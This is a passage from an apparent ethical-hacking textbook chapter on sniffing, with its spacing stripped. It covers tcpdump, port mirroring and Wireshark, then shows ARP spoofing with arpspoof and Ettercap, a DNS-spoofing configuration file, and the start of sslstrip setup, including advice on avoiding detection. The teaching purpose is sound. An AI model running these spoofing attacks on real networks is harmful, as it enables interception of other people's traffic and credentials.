Sniffing■segments,youwouldgetdetailslikethesequenceandacknowledgmentnumbersaswellastheflagsset.Sofar,allwehaveseenistheprotocolheaders.Therehasn’tbeenanypayloaddata.Wecantakealookatthepayloadusingthe-­Xparameter.Thisperformsahexdumpofthepayloadofthemessage.Hexadecimal(hex)dumpsshoweachbyteinitshexadecimalrepresentation.ItalsoprovidesanASCIIdecodeofeachbyte.ThismeansiftheASCIIvalueisaprintablecharacter,youwillseethatprintablecharacterontherightside.Evenincaseswhereyouseeprintablecharacters,themeaningofthebytetotheprotocolinusemaynotbethatcharacter.Itmayjustbethenumericvalueofthatbyte.HexadecimalRepresentationof Packet[email protected]:~#tcpdump-­ieth0-­Xtcpdump:verboseoutputsuppressed,use-­vor-­vvforfullprotocoldecodelisteningoneth0,link-­typeEN10MB(Ethernet),capturesize262144bytes10:49:35.174771STP802.1d,Config,Flags[none],bridge-­id7000.2c:08:8c:1c:3b:db.8001,length430x0000:000000000070002c088c1c3bdb000000.....p.,...;....0x0010:0070002c088c1c3bdb80010000140001.p.,...;........0x0020:0004000000000000000000...........10:49:35.578186IPsamsung.lan.8001>st-­routers.mcast.net.8001:UDP,length2000x0000:450000e4c56340000111bcdfc0a85616[email protected]0x0010:e00000071f411f4100d09a567b226461.....A.A...V{"da0x0020:7461223a7b227631223a7b2275726922ta":{"v1":{"uri"0x0030:3a22687474703a2f2f3139322e313638:"http://192.1680x0040:2e38362e32323a383030312f6d732f31.86.22:8001/ms/10x0050:2e302f227d2c227632223a7b22757269.0/"},"v2":{"uri0x0060:223a22687474703a2f2f3139322e3136":"http://192.160x0070:382e38362e32323a383030312f6170698.86.22:8001/api0x0080:2f76322f227d7d2c2272656d6f746522/v2/"}},"remote"0x0090:3a22312e30222c22736964223a227575:"1.0","sid":"uu0x00a0:69643a32623935626466652d61383033id:2b95bdfe-­a8030x00b0:2d343234662d393135302d3435323434-­424f-­9150-­452440x00c0:63383162386230222c2274746c223a38c81b8b0","ttl":80x00d0:3030302c2274797065223a22616c6976000,"type":"aliv0x00e0:65227d0ae"}.10:49:35.578979IPquiche.lan.60408>testwifi.here.domain:10006+PTR?7.0.0.224.in-­addr.arpa.(40)0x0000:45000044163c40004011f6e1c0a85639E..D.yazpistachio.lan.64631:Flags[P.],seq3616191731:3616191919,ack453098787,win315,options[nop,nop,TSval16893480ecr1259709774],length18818:32:07.836406IPquiche.lan.60511>testwifi.here.domain:58726+PTR?26.86.168.192.in-­addr.arpa.(44)18:32:07.838352IPtestwifi.here.domain>quiche.lan.60511:58726*1/0/0PTRyazpistachio.lan.(100)18:32:07.838530IPquiche.lan.60657>testwifi.here.domain:4670+PTR?57.86.168.192.in-­addr.arpa.(44)18:32:07.840275IPtestwifi.here.domain>quiche.lan.60657:4670*1/0/0PTRquiche.lan.(94)18:32:07.840505IPquiche.lan.ssh>yazpistachio.lan.64631:Flags[P.],seq188:408,ack1,win315,options[nop,nop,TSval16893485ecr1259709774],length220Youcancombinedifferentfilterprimitives.Forexample,youcanseeinthefollowingcodelistinghowyouwouldcaptureTCPpacketsthateithercamefromorweregoingtothehost192.168.86.1.Withcomplexfiltersandalsoforclarity,youcanuseparenthesestoisolateoneoftheparameters.You’llnoticethebackslashesthatareusedheretomakesuretheLinuxshelldoesn’ttrytointerpretthem,andtheyarepassedasparenthesestotcpdump.ComplexFilterswith BPF[email protected]:~#tcpdumptcpand\(host192.168.86.1\)tcpdump:verboseoutputsuppressed,use-­vor-­vvforfullprotocoldecodelisteningoneth0,link-­typeEN10MB(Ethernet),capturesize262144bytes18:41:33.287262IPquiche.lan.43790>testwifi.here.http:Flags[S],seq674275431,win29200,options[mss1460,sackOK,TSval2412954967ecr0,nop,wscale7],length018:41:33.288206IPtestwifi.here.http>quiche.lan.43790:Flags[S.],seq239316039,ack674275432,win28960,options[mss1460,sackOK,TSval235265600ecr2412954967,nop,wscale7],length018:41:33.288269IPquiche.lan.43790>testwifi.here.http:Flags[.],ack1,win229,options[nop,nop,TSval2412954968ecr235265600],length0384 Chapter9  Sniffing■8:41:37.111956IPquiche.lan.43790>testwifi.here.http:Flags[F.],seq1,1ack1,win229,options[nop,nop,TSval2412958792ecr235265600],length018:41:37.113495IPtestwifi.here.http>quiche.lan.43790:Flags[F.],seq1,ack2,win227,options[nop,nop,TSval235265982ecr2412958792],length018:41:37.113515IPquiche.lan.43790>testwifi.here.http:Flags[.],ack2,win229,options[nop,nop,TSval2412958793ecr235265982],length0KeepinmindthatwhenyouareusingBPFonthecommandlinewithtcpdump,youareusingacapturefilter.Thismeansthatyouwon’tseeanythingthatdoesn’tpassthefilter.Ifyouarewritingyourcapturetoafile,youwon’thaveanythingthatdoesn’tpassthefilter.Ifyouareexpectingtoperformanalysisonthecapturedfilelater,youshouldmakesureyouwon’tneedthosepacketslater.Thinkcarefullyaboutthefiltersyouusebeforeapplyingthemtocapture.PortMirroring/SpanningBackwheneverythingusedsimplehubs,whichwerejustelectricalrepeaterswithnointelligence,gettingtrafficfromeverywhereonthenetworkwaseasy.Thencameswitches.Thesearedevicesthatimprovetheperformanceandsecurityofanetworkbydoingfilteringatlayer2atthenetworkdevice.Aswitchknowswhichsystemsareconnectedtoitatwhichport.WhenaframecomesinwithadestinationMACaddress,theswitchcanlookuptheportwheretheMACaddressisandsendtheframeoutthatporttothedestinationsystem.Thisway,othersystemsonthenetworkneverseethatframepasstheirnetworkinterface.Thismakescapturingpacketsmoredifficultifyouarelookingfortrafficthatisn’tpassingyournetworkinterface.Onewaytogetaroundthatistohaveaccesstotheswitch.Thiswouldallowyoutoconfiguretheswitchtomirrorports.Itmeansanytrafficthatpassesthroughoneportwouldbemirroredtoanotherport.Youmaybeabletomirrormultipleportstoasingleport,whichwouldletyoumonitortraffictoandfrommultiplesystems.Ifyoucouldmonitoronlyasingleport,youcouldconsidermirroringtheportthatledtoagateway/routingdevice.Thismeansyouareseeingtrafficenteringandexitingthenetwork,whichcouldpotentiallygiveyoumoreaccesstosensitiveinformationthanifyouweretojustmonitorasingleendpoint.OnCiscodevices,thefeatureusedforconfiguringportmirroringisreferredtoasSwitchedPortAnalyzer(SPAN).Whenyousetupportmirroring,youareconfiguringaSPANport.Asaresult,youmayheartheprocessreferredtoasportspanning.Otherswitchvendorsmayuseotherterminologyforthisprocess.Oneconsiderationwhenyouaremirroringportsistheideaofoversubscription.Ifyouhavefive1gswitchportsandyouaremirroringthemouttoasingle1gport,youhavethepossibilityofoversubscribingthereceivingport.Thismeansyoucouldeasilydroppacketsyouweretryingtocaptureandthepacketswouldbebasicallyrandom,dependingonwhenyouhavetoomuchdatacomingintobeabletosendout.PacketAnalysis 385PacketAnalysisUltimately,packetanalysisisprobablyabigpartofwhyyouarecapturingthepacketstobeginwith.Onceyouhavethepackets,youwillwanttotakeacloserlookatthem,includingfiltering,followingcommunicationstreams,andmaybeevenlookingatthestatisticsandothervisualizationsfromthepacketcapture.ThisisanotherareawhereWiresharkreallyexcelsandcanhelpyoualot.Asnotedearlier,Wiresharkreallyunderstandsprotocols,whichmeansitnotonlycandecodetheprotocol,itcanalsotellyouplaceswheretheremaybeprotocolviolations.ThereareanumberofotherplaceswhereWiresharkcanmakereadingthroughapacketcapturesignificantlyeasier.Wiresharkisgoodatdetermininginformationthatisn’tdirectlyprovided.Itwillcolorframeswhereitidentifiesproblemsintheframelistbasedonrulesets.Theserulesetsmaybechangedandaddedto.Thedefaultrulescolorframeswitherrorstohaveblackbackgroundswithredtext.Onceyouopenthepacketinthewindowbelowtheframelist,youcangetthedetailsabouttheerror.Anywhereyouseesquarebrackets,[],inWireshark,youarelookingatdataprovidedbyWiresharkthatithascalculatedorinferredfromthemessagesithasreceived.Asanexample,Figure 9.7showsthedetailsofaframewheretherewereerrors.You’llseeplaceswhereWiresharkprovidesinformationinsquarebracketstohelpyouout.FIGURE 9.7 PacketanalysisWiresharkwilltakecareofcalculationsthatwillmakelifeeasierforyou.WhenaTCPconnectionstartsup,sequencenumbersaregenerated,andtopreventspoofingTCPconnections,theinitialsequencenumbershouldberandom.Asequencenumberis4bytes,sotheyarelargenumbers.Sequencenumbersincrementbasedonthenumberofbytesthataretransmitted.Ifyouweretotrytodothisadditionyourself,youwouldbespendingsometimetrackingsequencenumbersandacknowledgmentnumbers.Instead,tomakeiteasier,Wiresharkprovidesyouwitharelativesequencenumber.Thefirstsequencenumberis1accordingtoWireshark.Therelativesequencenumberthenincrementsasyouwouldnormallyexpect.Figure 9.8showstheTCPheaderswitharelativesequencenumber.386 Chapter9  Sniffing■FIGURE 9.8 RelativesequencenumbersPackets(orframes)thatbelongtoaparticularconversationcanbespreadthroughapacketcapture.Youmayfinditdifficulttomovefromonepacketintheconversationtoanother,especiallyiftherearealotofframesthatpassbyinbetween.Wiresharkallowsyoutofollowastream.Thiscanbedonefromacontextmenuthatcomesupwhenyouright-­clickaframethatbelongstotheconversation.IfyouselectFollowTCPStream,forexample,Wiresharkwillcreateadisplayfilterforyou,onlyshowingtheframesthatbelongtothatconversation.Inaddition,Wiresharkwillextractthedatafromthepayload,presentingittoyou.WithanHTTPconversation,forexample,youwillseethetextoftheHTTPmessagesbetweentheclientandtheserver.Figure 9.9showsthedialogboxthatcomesupshowingthetextofanHTTPconversation.Theclientmessagesarecoloredwithapinkbackgroundandredtext,whiletheservermessagesareinbluewithalilacorlightpurplebackground.Atthebottom,youwillseeitsaysSaveAndShowDataAsandASCIIisselected.Thereareotheroptions,includingraw,Carrays,andYAML.Wiresharkalsohassubstantialcapabilitiestopresentstatisticsfromthepacketcapture.ThereisaStatisticsmenuthathasalotofoptions.OneofthemisProtocolHierarchy.Thisshowseveryprotocolidentifiedinthecaptureinahierarchybasedonhowtheprotocolsarerelated.Forexample,asshowninFigure 9.10,everythingisaframe,andalloftheseframesareEthernet.OutofalloftheEthernetframes,everythinginthisparticularcaptureisanIPpacket.Fromthere,5.5percentareUDPdatagrams.SSDP,MDNS,andDNSareallprotocolsthatmakeuseofUDPasaTransportlayerprotocol.ThemajorityofthepacketscapturedareTCPsegments.MostofthoseareSSL,thoughinrealitytheyareallTLS,whichisthesuccessorprotocoltoSSL.PacketAnalysis 387FIGURE 9.9 FollowTCPStreamdialogboxAnotherentryinthestatisticsmenutolookatistheConversationsview.Thisshowsalltheconversationsbetweenendpointsinthepacketcapture.Everylayerofthecapturehasdifferentsetsofconversations,sincelayer2conversationsaredifferentthanIPaddressconversations.AnyIPconversationthatpassesoutofthelocalnetworkhasalayer2388 Chapter9  Sniffing■conversationwiththelocalgateway.ThismeansyoumaylikelyhavefewerEthernetconversationsthanyoudoIPconversations.Additionally,yourTCPconversationswillbedifferentfromyourIPconversations.YoumayhavemultiplesetsofportsbetweentwoIPaddresses.Thismaybeespeciallytrueifyourlocalbrowsersetsupmultipleconnectionstoawebservertoissuerequestsforimages,HTMLpages,andotherresourcesthatgointotherenderingofapage.Figure 9.11showstheConversationsstatisticsfromapacketcapture.FIGURE 9.10 ProtocolHierarchystatisticsFIGURE 9.11 ConversationsstatisticsPacketAnalysis 389OnelastfeaturetolookatisintheAnalyzemenu.Wiresharkdoesperformanalysisonframesandpacketsasitgetsthem.Welookedatsomeoftheseearlierbylookingatthelistofframesandlookingatcolors.Additionally,whenwelookedattheprotocoldecode,youcouldseeerrorsincaseswheretheinformationidentifiedbyWiresharkisinsquarebrackets.Youdon’thavetoskimallthewaythroughthepacketcapturefiletofindtheerrorsoneatatime.Instead,ifyougototheAnalyzemenu,youcanselectExpertInformation,andthiswillshowyoualloftheframesthatWiresharkhasidentifiedasproblematic.InFigure 9.12,youcanseealloftheexpertinformationbycategory.Youseetheerrors,warnings,notes,andchat.Ifyouweretoopeneachoftheseentries,youwouldgetalistofframes.Clickingoneoftheseentriestakesyoutothatframeinthecapturesoyoucanseeitsdetails.FIGURE 9.12 ExpertInformationOneelementofpacketcapturethatwehaven’tspentanytimeonisthetimestamp.Packetsdon’tcontaintimestamps,sojustlookingatmostframesorpacketswon’tgiveyouthetimetheframepassedthroughthenetwork.WhenyoulookatthetimecolumninWireshark,youwillfindarelativetime.Thisisrelativetothestartofthecapture.Thatmaynotbeveryusefultoyou.Helpfully,packetcapturefileswillincludethetimeofthestartof390 Chapter9  Sniffing■thecaptureinthemetadata.ThismeansyoucanchangethetimeshowninWiresharktobeabsolutetime.Thisassumesthetimeandthetimezoneinthecapturingfilewerecorrect,sinceitdoesrelyontheconfigurationofthecapturingsystem.SpoofingAttacksYoumaynothavetobestuckwithonlycapturingpacketsthataredestinedtoyoursystemoronesthatyoucangettoyoubyreconfiguringtheswitch.Thereareotherwaystogetmessagestoyou.Thiscanbedonebyusingdifferenttypesofspoofingattacks.Aspoofingattackiswhereyoupretendtobeasystemyouaren’t.Youcanapproachthisfromdifferentlayers,startingatlayer2.Youcanalsospoofatahigherlayer,usingDNStogetsystemstosendtraffictosystemsyouwant.Spoofingattacksallowyoutositinthemiddleofaconversationbetweentwoendpoints.Thisbringsupanissueyouneedtokeepinmind.Ifyouarerunningspoofingattacks,itmeansatleastoneendoftheconversationispotentiallynotgettingtotheappropriateendpoint.Ifeverythingdoesn’tlookright,someoneisgoingtostartsuspectingsomething.Thismeansyouneedtomakesureyouaredoingsomethingtomaketheconversationwhole.Ifsomeonegetssuspiciousthatsomethingiswrong,theymaystartlookingforcauses,whichmaymeanyoucouldbeidentified.Presumably,ifyouarerunningaspoofingattack,youdon’twanttobeidentifiedandcaught.Asalways,youneedtomakesureyouareusingthesepowersforgoodandnotforevil.ARPSpoofingTheAddressResolutionProtocol(ARP)hastwostages.Thefirstistherequest,whereasystemknowsanIPaddressbutdoesn’tknowthecorrespondingMACaddress.ItsendsanARPrequestaskingforthesystemwiththeIPaddresstorespondwithitsMACaddress.Theresponseisthesystemreplying,indicatingitsMACaddresstotherequestor.Thereisnothingtoauthenticatethatrequest,though.Intheory,anyonecouldrespondtothatrequestwiththeirMACaddresstogettherequestingsystemtosendthemessagetotheattacker’s/spoofer’saddress.Wecouldmakeiteveneasierbysimplynotwaitingfortherequesttobeginwithandjustsendingthereply.ARPPoisoningYoumayalsohearthetermARPpoisoning,whichmeansthesamethingasARPspoofing.YouarepoisoningtheARPcacheontargetsystemswithbadentries.SpoofingAttacks 391Tobeefficient,systemswilltakeanyARPresponses,eveniftheydidn’task,andcachethemapping.ThiskeepsthemfromhavingtoaskfortheMACaddressshouldtheyeverneedit.Thisisafeaturewecantakeadvantageof.WecouldjustsendoutARPresponses,mappingwhateverIPaddressonthenetworkwewanttoourMACaddress.Thiswouldget allsystemsonthelocalnetworksendingmessagestous,asouraddressisintheirARPcache.TheprocessofjustsendingoutARPresponseswithoutacorrespondingARPrequestiscalledgratuitousARP,meaningit’sanARPmessagethatwasn’taskedfor.OneoftheproblemswehaveisthelengthoftimeARPentriesarecachedfor.OnLinuxsystems,thedefaultcachelengthis60seconds.Youcancheckitfromanentryinthe/procpseudofilesystem,asyoucanseeinthefollowingcodelisting.Youcouldalsochangethebehaviorbyreplacingthe60 withanothervalue.OnWindowssystems,thecachetimeisdifferent.MicrosoftoptedtofollowRFC4861,whichappliestoIPv6,fortheIPv4implementation.StartingwithWindowsVista,Microsofthasabasetimeof30,000 milliseconds,whichismultipliedbyarandomvaluebetween.5and1.5togetthecacheduration.Thismeansit’sdifferentfromonesystemtoanotherandalsofromoneboottoanother.ARPCacheDurationon Linuxcat/proc/sys/net/ipv4/neigh/default/gc_stale_time60Becausethecachecantimeoutquickly,wehavetokeepsendingoutourgratuitousARPresponses.Obviously,thisissomethingbetterdoneprogrammaticallyratherthanmanually.Thisisespeciallytruesincethereisanotherproblem.Whenweredirectmessagestooursystem,wereallyneedtoforwardthembackoutontothenetworkwiththecorrectMACaddressinthedestinationfield.Otherwise,conversationsdon’thappen.ATCPconnectionnevercompletesbecausetheSYNortheSYN/ACKneverreachestheappropriatedestinationsystem.Instead,itissenttooursystemwhereitdead-­endsunlesswedosomething.Thisrequiresturningonforwardingsothemessagewearehijackingcanbeforwardedbackoutthesameinterfacetogettoitsintendeddestination.ThereareafewprogramsthatcanbeusedtohandleARPspoofing.Oneofthem,arpspoof,hasbeenaroundforalongtimenow.ItwaswrittenbyDugSong,whoalsowroteaprogramcalledfragroute,whichisusefulinitsownway.Usingarpspoof,wecaninjectourselvesinbetweentwosystemsonthenetwork.WecantellarpspoofwhichtwoIPaddresseswewanttopretendtobe.Ittakescareoftherestforus.Inthefollowingcodelisting,youcanseearunofarpspoofwhereI’veselectedthedefaultgatewayonmynetworktobetheoneIspoof.ThismeansIgetmessagesthataredestinedforthedefaultgateway,soanythingthat’sgoingoff-­netgetssenttothesystemrunningarpspoof.You’llseethegratuitousARPresponsesbeingsent.TheygetsentouteveryfewsecondstoensurethatnoARPcacheentriesageout.392 Chapter9  Sniffing■Usingarpspoof[email protected]:~$sudoarpspoof-­ieth00:1c:42:38:62:8eff:ff:ff:ff:ff:ff08060:1c:42:38:62:8e0:1c:42:38:62:8eff:ff:ff:ff:ff:ff08060:1c:42:38:62:8e0:1c:42:38:62:8eff:ff:ff:ff:ff:ff08060:1c:42:38:62:8e0:1c:42:38:62:8eff:ff:ff:ff:ff:ff08060:1c:42:38:62:8e0:1c:42:38:62:8eff:ff:ff:ff:ff:ff08060:1c:42:38:62:8e0:1c:42:38:62:8eff:ff:ff:ff:ff:ff08060:1c:42:38:62:8e0:1c:42:38:62:8eff:ff:ff:ff:ff:ff08060:1c:42:38:62:8e0:1c:42:38:62:8eff:ff:ff:ff:ff:ff08060:1c:42:38:62:8e^CCleaningupandre-­arpingtargets...-­cboth192.168.86.142:arpreply192.168.86.1is-­at42:arpreply192.168.86.1is-­at42:arpreply192.168.86.1is-­at42:arpreply192.168.86.1is-­at42:arpreply192.168.86.1is-­at42:arpreply192.168.86.1is-­at42:arpreply192.168.86.1is-­at42:arpreply192.168.86.1is-­atInsteadofselectingapairofhoststositbetween,I’veessentiallysaidIwanttositbetweentheentirenetworkandthedefaultgateway.Theproblemwiththisapproachisthatonlyonesideoftheconversationwillarriveatthissystem—­thesidethatisdestinedforthedefaultgateway.Theresponsefromoutsidethenetworkwon’tshowupatthesystemwherearpspoofisrunning.Thiscouldbefixedbyadding-­twithatargetIPaddressandthen-­rtoindicatethatreverseconnectionsshouldbecollectedaswell.Then,bothofthesystemsspecifiedwouldbespoofedtogotothesystemwherearpspoofisrunning.AnothertoolwecoulduseforARPspoofing,whichhasmultipleusesinfact,isEttercap.Ettercaphastwomodes.Oneisaconsole-­basedmode.TheotherisaGUI-­basedmode.WhenyourunEttercap,youhavetoindicatewhichmodeyouwantittorunin.InGUImode,youcanmoreeasilyselectwhichhostsyouwanttotarget.Ettercapisasnifferthatcanalsorunman-­in-­the-­middle(MitM)attacks.WhenyourunanARPspoofattack,youneedtoknowIPaddresstoMACaddressmappings,andyouneedtogetEttercaptocheckforhostsonthenetwork.ThefirstthingtodoistotellEttercapyouaregoingtodoaUnifiedsniffifthereisonlyoneinterfaceonthesystemEttercapisrunningon,oraBridgedsniffiftherearemultipleinterfaces.Oncethat’sdone,othermenusshowup.Onceitrunsascanofallthehosts,youcanbringupahostlist.YoucanseethehostlistinEttercapinFigure 9.13.Oncethehostlistisinplace,youcanselectthehostsyouwanttotarget.Sinceultimatelywe’retalkingaboutconversations,youcanhavetwotargetstoplacehostsinto.Thisreferstotwoendsoftheconversation.Let’ssayyouwantedtolistentoaconversationbetweentwohostsonyournetwork,likeaclientsystemandalocaldomaincontroller,soastopotentiallygrabcredentials.YouwouldputoneofthesystemsinTarget1andtheotherintoTarget2.SpoofingAttacks 393FIGURE 9.13 EttercaphostlistOncethetargetsareselected,youcanselectARPSpooffromtheMitMmenu,whichisnotshownhere.Thereareotheroptionsinthatmenu,whichyoucanseeinFigure 9.14.Thistime,we’regoingtojustselectARPSpoof.Thatselectionwillbringupadialogboxaskingifwewanttosniffremoteconnectionsandalsoifwewanttospoofoneway.Makeselectionsthereandthespoofingstarts.Oncethespoofinghasstarted,youcandowhateveryoulikewiththetrafficthatissuddenlycomingintoyoursystem.Youcancheckeasilyenoughtomakesurethetrafficisarrivingbyjustcapturingpackets.Whatyouseeherearesomepacketsgoingbetween192.168.86.55and192.168.86.1.NeitheroftheseIPaddressesbelongstothesystemwhereWireshark(andEttercap)isrunning.Thismeanstheattackisworkingcorrectly.Ratherthanselectingapairoftargets,Iselectedonlyasingletarget.Bydefault,withonetargetinTarget1andnothingelseexplicitlyselected,everyothersystemonthenetworkisinTarget2.Onceyouaredonecapturingtrafficoffthenetwork,youneedtoremembertostoptheattack.Yourtoolmayseedthenetworkwiththecorrectmappings,thoughintimethebadARPcacheentrieswilljusttimeout.Asnotedearlier,onLinuxsystems,thatwouldbewithinaminute.OnWindowssystems,it’sevenless.It’snotabsolutelyrequiredtorestorethenetworktonormal,butitwouldbepolitetodoso.Youmaycauseissuesonthenetworkifyoudon’t.Itwouldn’tbeserious,butanydisruptioncouldendupcausingissues.394 Chapter9  Sniffing■FIGURE 9.14 RSAkeyspreferencesDNSSpoofingAnotherwaytocapturetrafficistouseatechniquecalledDNSspoofing.ThisismoretargetedthananARPspoof,however.ARPspoofingcastsaverywidenet,lookingtocaptureeverymessagebeingsent.WithDNSspoofing,wearen’tlookingtocapturetrafficnecessarily,inthesenseofgrabbinganexistingconversation.Instead,wearelookingtogetatargettocometosystemsunderourcontrolforspecificrequests.WedothisbyinterceptingDNSrequestsandprovidingresponsestotherequestor.Insteadofprovidinglegitimateresponses,we’regoingtobeusingourownaddresses.Whenoneofourtargetstriestovisitawebsitethatweareinterestedingettinginformationfrom,weredirectthemtoanIPaddresswherewehaveourownwebsitesetup.ThisissomethingwecanuseEttercapforagain.ItisespeciallyusefulbecauseitmakesitsomucheasiertocapturetheDNSrequest.Unlesswecancapturethetrafficsomewhere,it’shardtomakesurewearegettingtheDNSrequestsowecanknowhowandwhentorespondtoit.UnlikewithARP,wecan’tjustsendaspuriousresponsetoasystemandhaveitcachetheaddress.ThisisnottosaythatDNSinformationisn’tcached.JustaswithARP,systemswanttobeasefficientaspossible.DNSrequestsaretime-­consuming,sooperatingsystemsdon’twanttomakethemunlesstheyarenecessary.Wherepossible,operatingsystemswillcacheDNSmappingsfromhostnametoIPaddress.Thatmeanswepoisonthecacheonceandhavethesystemcontinuetosendrequeststothewrongaddressforpotentiallydays.SpoofingAttacks 395EttercaprequiresaconfigurationfileinwhichyousetuptheDNSrecordsyouwanttospoof.ItwilllookjustlikeaDNSzonefile,whereyouprovidetherecordname,therecordtype,andwhatitmapsto.Inthefollowingcodelisting,youcanseeasampleoftheDNSconfigurationfile.Inthiscase,thehostnameswww.foo.comandwww.wubble.comarebothmappedtothesameIPaddress.AtthatsingleIPaddress,sincethesearewebsitehostnames,thereshouldbeawebserverthatiscapableofservingrequestsforthosehostnames.Additionally,thereisamappingforamailexchangerrecord.Thiscouldbeusedifyouwanttointerceptemailtothedomainindicatedintheconfigurationfile.ThelocationofthefileintheLinuxdistributionI’mworkingfromis/etc/ettercap/etter.dns.Thereareanumberofentriesalreadyinplacethere.DNSConfigurationfor Ettercap##Samplehostsfilefordns_spoofplugin#www.foo.comA192.168.86.57www.wubble.comA192.168.86.57mail.foo.comA192.168.86.57foo.comMX###192.168.86.57OnceDNSisinplace,weneedtogobacktosetupEttercaptointercepttraffic.Thisisthesameprocesswedidbefore.WeneedtosnifftrafficsoEttercapcanseetherequestscomein.WealsoneedtouseanARPspoofattacktogettrafficonthenetworktooursystemsowecanseetheDNSrequests.OnceyougettothestageofstartinganARPspoof,youcangotothePluginsmenuandselectManagePlugins.Fromthere,youcanenabletheDNSspoofplug-­in.Thiswillautomaticallyloadtheetter.dnsfilethatwaseditedearlier.Incaseit’snotapparent,theseattackswillworkonlyonthelocalnetworkbecausetheaddressingisbyMACaddress.Thisrequiresphysicalnetworkconnectivityfortheinterfacebeingusedtorunthespoofing.Inthefollowinglisting,youwillseethelogthatiswrittenoutinEttercapfromanyrequestthathasbeencaptured.Whiletheentriesintheprecedingcodelistingwereadded,noneofthedefaultentriesinthefilewereremoved.Microsoft’swebsiteisoneofthehostnamesthatisbeingredirected.Inthatcase,it’snotbeingredirectedtooneofourlocalsystemsbutinsteadtoanothersystemontheInternet altogether.SinceweareusingDNShere,thehostdoesn’thavetobeonthelocalnetwork.DNSwillrespondwithanIPaddress,andtherequestingsystemwillattempttomakeaconnectiontothatIPaddress.Theonlyreasonweneedlocalaccessistocapturetherequests.Oncetherequestshavebeencapturedandrespondedto,everythingislayer3andabove.396 Chapter9  Sniffing■EttercapDNSSpoofLogENDL3ERROR:246bytepacket(0800:06)destinedto192.168.86.26wasnotSforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:48bytepacket(0800:11)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:83bytepacket(0800:06)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:52bytepacket(0800:06)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:52bytepacket(0800:06)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:48bytepacket(0800:11)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:48bytepacket(0800:11)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:48bytepacket(0800:11)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:52bytepacket(0800:06)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))SENDL3ERROR:245bytepacket(0800:06)destinedto192.168.86.26wasnotforwarded(libnet_write_raw_ipv4():-­1byteswritten(Networkisunreachable))DHCP:[192.168.86.1]ACK:192.168.86.43255.255.255.0GW192.168.86.1DNS192.168.86.1"lan"dns_spoof:A[browser.pipe.aria.microsoft.com]spoofedto[107.170.40.56]Thereasonthisworks,eventhoughtheDNSrequestdoesgoouttothelegitimateDNSserveranditresponds,isbecauseDNSisUDP,sothereisnoconnectiontobemade.AUDP-­basedrequestgoesout,andaUDP-­basedresponsecomesback.Asystemmaysendoutmultiplerequests,sincetheyareUDP,andthereisnoguaranteetherequestwillgettotheSpoofingAttacks 397DNSserver.Thefirstresponsethatisreceivedbytherequestingsystemwillbeused.SincetheEttercapsystemisonthelocalnetworkandthereisagoodchancetheDNSserverisnot,theDNSresponsefromtheEttercapsystemshouldbethefirstoneback.Anysubsequentresponsestotherequestingsystemwillbeignored.Bythatpoint,theaddressconfiguredinetter.dnshasbeensentbacktotherequestingsystemandpopulatedtheDNScacheonthatsystem.sslstripEncryptedmessagesareproblematicwhenitcomestocapturingtraffic.Encryptionisintendedtobeendtoend,meaningthereisnowaytositinthemiddle.Anymechanismtositinthemiddledefeatstheend-­to-­endexpectationofmostencryptionschemes.Havingsaidthat,itisinournatureasethicalhackerstotrytoviolaterulesandbreakthings.Therearewaystotrytobreakencryptedprotocols.Ofcourse,thiswasmucheasierwhenSSLwasbeingused.SSLhadmultiplevulnerabilitiesoverthedifferentversionspriortoTLS.EvenwhenTLSwasbroughtintoreplaceSSLbecauseofSSL’svulnerabilities,theearlyversionsofTLShadvulnerabilitiesthatmadeitsusceptibletohavingtheencryptioncracked.TheprogramsslstripwasdevelopedtograbSSLmessagesandstriptheencryptionfromthem.ThisprogramwasdevelopedbyMoxieMarlinspikeinconjunctionwithapresentationhemadeatBlackHatin2009.ThatwasinthedayswhenSSLwasstillprevalent,sotherewasagoodchanceitwouldwork.Today,thereislessofalikelihoodofsuccessbecause,ideally,systemadministratorsontopoftheirgamehaveremovedolderencryptionmechanismslikeSSLandTLS1.0and1.1.IfaserveronlysupportsTLS1.2andabove,SSLstripwon’tworkbecausethevulnerabilitiesthatallowedittoworkhavebeenresolved.Youcouldusesslstripasastand-­aloneprogram.Essentially,sslstripactsasatransparentproxy,sittingbetweentheserverandclient.Indoingthat,itcanchangelinksfromHTTPStoHTTPinsomecases.Italsousesothertechniquestomakeitappearthattheconnectionisencryptedwhen,infact,itisn’t.Asastand-­alone,sslstripmakesuseofarpspoof,whichwelookedatearlier.However,itispossibletorunsslstripasaplug-­intoEttercap.JustaswedidwiththeDNSspoofing,sslstriprequiresthatwehaveanARPspoofinplace.WecandothiswithEttercap,justaswedidearlier.WewouldwanttospooftheInternetgatewayaswehavebefore.WealsoneedtosniffremoteconnectionswhenwesetuptheARPspoofingattack.sslstripisaplug-­intoEttercap,soitcanbeenabledjustastheDNSspoofingplug-­inwasenabled.ThisdoesrequireaconfigurationchangeinEttercapbeforeenablingtheplug-­in.sslstripneedstoknowwhatfirewallcommandisbeingusedso itcansetuparedirectinthefirewall.Thefollowinglinesarecommentedinthe/etc/ettercap/etter.conffile.Theyneedtobeuncommentedifyouareusingiptables,whichismorelikelythanipchains,whichistheotheroption.398 Chapter9  